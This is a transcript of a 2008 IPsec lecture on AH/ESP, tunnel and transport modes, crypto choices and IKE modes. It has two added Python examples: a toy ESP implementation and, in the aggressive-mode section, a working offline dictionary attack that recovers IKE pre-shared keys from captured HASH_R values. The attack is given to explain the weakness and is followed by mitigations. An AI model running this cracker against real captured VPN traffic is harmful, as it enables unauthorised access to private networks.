Presentation Transcript
IPSec :IPSec By Maggie Zhou
Oct, 2008
Basic concepts :2 Basic concepts a suite of protocols for securing network connections
network layer, layer 3
IPsec supports network-level peer authentication, data origin authentication, data integrity, data confidentiality (encryption), and replay protection
AH versus ESP :3 AH versus ESP "Authentication Header" (AH)
"Encapsulating Security Payload" (ESP)
the two wire-level protocols IPsec uses to protect traffic:
AH authenticates the data flowing over the connection (integrity, data-origin authentication, anti-replay) but does not encrypt it;
ESP encrypts the data and, optionally, authenticates it as well.
They are typically used independently,
though it's possible (but uncommon) to use them both together.
Caveat: AH's integrity check also covers the immutable fields of the outer IP header, so AH fails as soon as a NAT rewrites addresses; ESP's check covers only the ESP header and payload, which is why ESP with authentication is what almost every real deployment uses.
Tunnel mode versus Transport mode :4 Tunnel mode versus Transport mode Transport mode provides a secure connection between two endpoints: the original IP header is kept and only the IP payload (TCP, UDP, ...) is encapsulated, so the endpoint addresses stay visible on the wire.
Tunnel mode encapsulates the entire original IP packet, header included, inside a new outer IP header to provide a virtual "secure hop" between two gateways;
it is used to form a traditional VPN, where the tunnel creates a secure path across an untrusted Internet and (with ESP) the original source and destination addresses are hidden from observers on that path.
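The following is an added example, not code from these slides: it builds a constructed IPv4/TCP packet and protects it with a minimal ESP implementation following the RFC 4303 packet layout (SPI, sequence number, encrypted payload plus trailer, ICV) in both transport and tunnel mode, so the difference between the two modes is visible directly: what the outer header carries and what the ESP next-header field says. The cipher is a hash-based keystream standing in for AES (a simplification, not a real IPsec transform), the IPv4 checksum is left at zero, and the addresses, keys, SPI and TCP segment are constructed values.

```python
import hmac
import hashlib
import struct

IPPROTO_IPIP = 4   # next-header ESP carries in tunnel mode: the payload is a whole IPv4 packet
IPPROTO_TCP = 6
IPPROTO_ESP = 50

def ipv4_header(src, dst, proto, payload_len):
    """Minimal 20-byte IPv4 header; checksum left at zero (constructed example)."""
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0, 0, 64, proto, 0, src, dst)

def parse_ipv4(pkt):
    """Return (header length, protocol, src, dst)."""
    ihl = (pkt[0] & 0x0F) * 4
    return ihl, pkt[9], pkt[12:16], pkt[16:20]

def keystream_xor(key, data):
    """Toy cipher: XOR with SHA-256(key || block counter). Stands in for AES; NOT for real use."""
    out = bytearray()
    for i in range(0, len(data), 32):
        block = hashlib.sha256(key + i.to_bytes(4, "big")).digest()
        out += bytes(a ^ b for a, b in zip(data[i:i + 32], block))
    return bytes(out)

def build_esp(inner, next_header, spi, seq, enc_key, auth_key):
    """ESP packet: SPI | seq | encrypt(inner | padding | pad-len | next-header) | ICV."""
    pad_len = (-(len(inner) + 2)) % 4          # RFC 4303: trailer must end on a 4-byte boundary
    padding = bytes(range(1, pad_len + 1))     # default monotonic padding bytes 1, 2, 3 ...
    plaintext = inner + padding + bytes([pad_len, next_header])
    hdr = struct.pack("!II", spi, seq)
    ct = keystream_xor(enc_key, plaintext)
    icv = hmac.new(auth_key, hdr + ct, hashlib.sha256).digest()[:16]   # HMAC-SHA-256-128 (RFC 4868)
    return hdr + ct + icv

def parse_esp(esp, enc_key, auth_key):
    """Verify the ICV before decrypting anything, then strip the trailer."""
    hdr, ct, icv = esp[:8], esp[8:-16], esp[-16:]
    expected = hmac.new(auth_key, hdr + ct, hashlib.sha256).digest()[:16]
    if not hmac.compare_digest(icv, expected):
        raise ValueError("ESP ICV mismatch: packet tampered or wrong SA")
    spi, seq = struct.unpack("!II", hdr)
    pt = keystream_xor(enc_key, ct)
    pad_len, next_header = pt[-2], pt[-1]
    return spi, seq, next_header, pt[:len(pt) - 2 - pad_len]

def protect(ip_pkt, mode, spi, seq, enc_key, auth_key, gw_src=None, gw_dst=None):
    """Apply ESP to an IPv4 packet in transport or tunnel mode."""
    ihl, proto, src, dst = parse_ipv4(ip_pkt)
    if mode == "transport":
        # original IP header stays on the outside; only the payload goes into ESP
        esp = build_esp(ip_pkt[ihl:], proto, spi, seq, enc_key, auth_key)
        return ipv4_header(src, dst, IPPROTO_ESP, len(esp)) + esp
    if mode == "tunnel":
        # entire original packet, header included, is hidden behind a new gateway-to-gateway header
        esp = build_esp(ip_pkt, IPPROTO_IPIP, spi, seq, enc_key, auth_key)
        return ipv4_header(gw_src, gw_dst, IPPROTO_ESP, len(esp)) + esp
    raise ValueError("mode must be 'transport' or 'tunnel'")

def unprotect(outer, enc_key, auth_key):
    """Receiver side: returns (outer src, outer dst, next_header, inner bytes)."""
    ihl, proto, src, dst = parse_ipv4(outer)
    if proto != IPPROTO_ESP:
        raise ValueError("not an ESP packet")
    _spi, _seq, next_header, inner = parse_esp(outer[ihl:], enc_key, auth_key)
    return src, dst, next_header, inner

def tamper_detected(outer, enc_key, auth_key, offset=30):
    """Flip one ciphertext bit in transit; a correct receiver must reject the packet."""
    mangled = bytearray(outer)
    mangled[offset] ^= 0x01
    try:
        unprotect(bytes(mangled), enc_key, auth_key)
        return False
    except ValueError:
        return True

# constructed sample: host 10.1.0.5 -> 10.2.0.7 with a fake TCP segment; gateways 198.51.100.1 and 203.0.113.1
HOST_A, HOST_B = bytes([10, 1, 0, 5]), bytes([10, 2, 0, 7])
GW_A, GW_B = bytes([198, 51, 100, 1]), bytes([203, 0, 113, 1])
TCP_SEGMENT = bytes.fromhex("1f90005000000001000000005002200000000000") + b"GET / HTTP/1.0\r\n\r\n"
ORIGINAL = ipv4_header(HOST_A, HOST_B, IPPROTO_TCP, len(TCP_SEGMENT)) + TCP_SEGMENT
ENC_KEY, AUTH_KEY = b"\x11" * 16, b"\x22" * 32   # constructed SA keys

if __name__ == "__main__":
    for mode in ("transport", "tunnel"):
        pkt = protect(ORIGINAL, mode, 0x1000, 1, ENC_KEY, AUTH_KEY, GW_A, GW_B)
        src, dst, nh, inner = unprotect(pkt, ENC_KEY, AUTH_KEY)
        print(f"{mode:9s} outer {src.hex()}->{dst.hex()} next-header {nh} inner {len(inner)} bytes")
```

In transport mode the receiver gets back next-header 6 (TCP) and the bare segment, with the host addresses still on the outer packet; in tunnel mode it gets next-header 4 (IP-in-IP) and the whole original packet, while the outer packet only shows the two gateways. The ICV is checked before any decryption, which is the order every real ESP implementation must follow.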
crypto choices :5 crypto choices Setting up an IPsec connection involves all kinds of crypto choices.
This is simplified substantially by the fact that any given security association uses at most two or (rarely) three algorithms at a time: one integrity/authentication algorithm plus, for ESP, one encryption algorithm.
MD5 versus SHA-1 versus DES versus 3DES versus AES versus blah blah. (Guidance has moved on since 2008: RFC 8221 says DES and HMAC-MD5 must not be used and 3DES should not be; AES, preferably AES-GCM, with SHA-2 based integrity is the current choice.)
IKE versus manual keys :6 IKE versus manual keys how the key data is exchanged.
Both sides of the conversation need to know the secret values used in hashing or encryption, and there are two ways to get them there.
Manual keys require manual entry of the secret values on both ends, presumably conveyed by some out-of-band mechanism; those keys never change on their own, so a leaked manual key exposes all traffic ever sent under it.
IKE (Internet Key Exchange) is a sophisticated mechanism for doing this online: the peers authenticate each other, run a Diffie-Hellman exchange, and derive and periodically refresh the session keys.
Main mode versus aggressive mode :7 Main mode versus aggressive mode These modes control an efficiency-versus-security tradeoff during the initial IKE (phase 1) key exchange.
"Main mode" requires six messages back and forth, but affords complete security during the establishment of an IPsec connection: the peers' identities and authentication hashes are sent only after the Diffie-Hellman exchange, encrypted.
Aggressive mode uses half the exchanges (three messages) but provides a bit less security because some information is transmitted in cleartext: the identities are exposed, and with pre-shared-key authentication the responder's hash is observable too, so a captured exchange can be attacked offline with a dictionary of candidate PSKs.
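An added example, not from these slides, showing the practical consequence of that cleartext. It uses the RFC 2409 derivations for the pre-shared-key case, SKEYID = prf(PSK, Ni | Nr) and HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b), with HMAC-SHA-1 as the prf. In aggressive mode every input to HASH_R except the PSK is carried in the clear in messages 1 and 2, so a passive capture can be run against a wordlist offline; the main-mode model below withholds the two fields (IDir, HASH_R) that mode sends encrypted. The nonces, cookies, Diffie-Hellman public values, SA payload body, identity and wordlist are constructed placeholders, not real captures.

```python
import hmac
import hashlib

def prf(key, data):
    """RFC 2409 prf is HMAC keyed with the negotiated hash; HMAC-SHA-1 here."""
    return hmac.new(key, data, hashlib.sha1).digest()

def skeyid_psk(psk, ni, nr):
    """SKEYID = prf(pre-shared-key, Ni_b | Nr_b)   (RFC 2409 section 5, pre-shared-key case)."""
    return prf(psk, ni + nr)

def hash_r(skeyid, g_xr, g_xi, cky_r, cky_i, sai_b, idir_b):
    """HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)."""
    return prf(skeyid, g_xr + g_xi + cky_r + cky_i + sai_b + idir_b)

def aggressive_exchange(psk):
    """Model of the 3-message aggressive exchange. Every field returned here travels in
    cleartext in messages 1 and 2, so a passive observer has all HASH_R inputs except the PSK."""
    wire = {
        "cky_i": bytes.fromhex("0102030405060708"), "cky_r": bytes.fromhex("1112131415161718"),
        "ni": bytes.fromhex("aa" * 16), "nr": bytes.fromhex("bb" * 16),        # constructed nonces
        "g_xi": bytes.fromhex("cc" * 32), "g_xr": bytes.fromhex("dd" * 32),    # placeholder DH publics
        "sai_b": bytes.fromhex("00000001000000010000002c"),                     # constructed SA body
        "idir_b": bytes([2, 0, 0, 0]) + b"vpn-gw.example",  # ID_FQDN (type 2) responder identity
    }
    skeyid = skeyid_psk(psk, wire["ni"], wire["nr"])
    wire["hash_r"] = hash_r(skeyid, wire["g_xr"], wire["g_xi"], wire["cky_r"], wire["cky_i"],
                            wire["sai_b"], wire["idir_b"])
    return wire

def main_mode_exchange(psk):
    """Same derivation, but in main mode IDir and HASH_R are sent in message 6 encrypted under
    keys derived from the DH secret, so a passive observer never sees them."""
    wire = aggressive_exchange(psk)
    for hidden in ("idir_b", "hash_r"):
        del wire[hidden]
    return wire

def crack_psk(capture, wordlist):
    """Offline dictionary attack: recompute HASH_R per candidate PSK and compare with the capture."""
    if "hash_r" not in capture or "idir_b" not in capture:
        return None   # nothing observable to test candidates against (main-mode capture)
    for cand in wordlist:
        skeyid = skeyid_psk(cand.encode(), capture["ni"], capture["nr"])
        guess = hash_r(skeyid, capture["g_xr"], capture["g_xi"], capture["cky_r"],
                       capture["cky_i"], capture["sai_b"], capture["idir_b"])
        if hmac.compare_digest(guess, capture["hash_r"]):
            return cand
    return None

WORDLIST = ["password", "cisco123", "vpn", "Summer2008!", "letmein"]   # constructed wordlist

if __name__ == "__main__":
    print(crack_psk(aggressive_exchange(b"Summer2008!"), WORDLIST))   # recovered from the capture
    print(crack_psk(main_mode_exchange(b"Summer2008!"), WORDLIST))    # None: nothing to attack
```

This is the attack that ike-scan's psk-crack runs against real captures. The usual mitigations are to avoid aggressive mode with pre-shared keys, to use certificate authentication (or IKEv2) instead, and, where a PSK is unavoidable, to make it long and random so a wordlist cannot reach it.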
AH: Authentication Only :9 AH: Authentication Only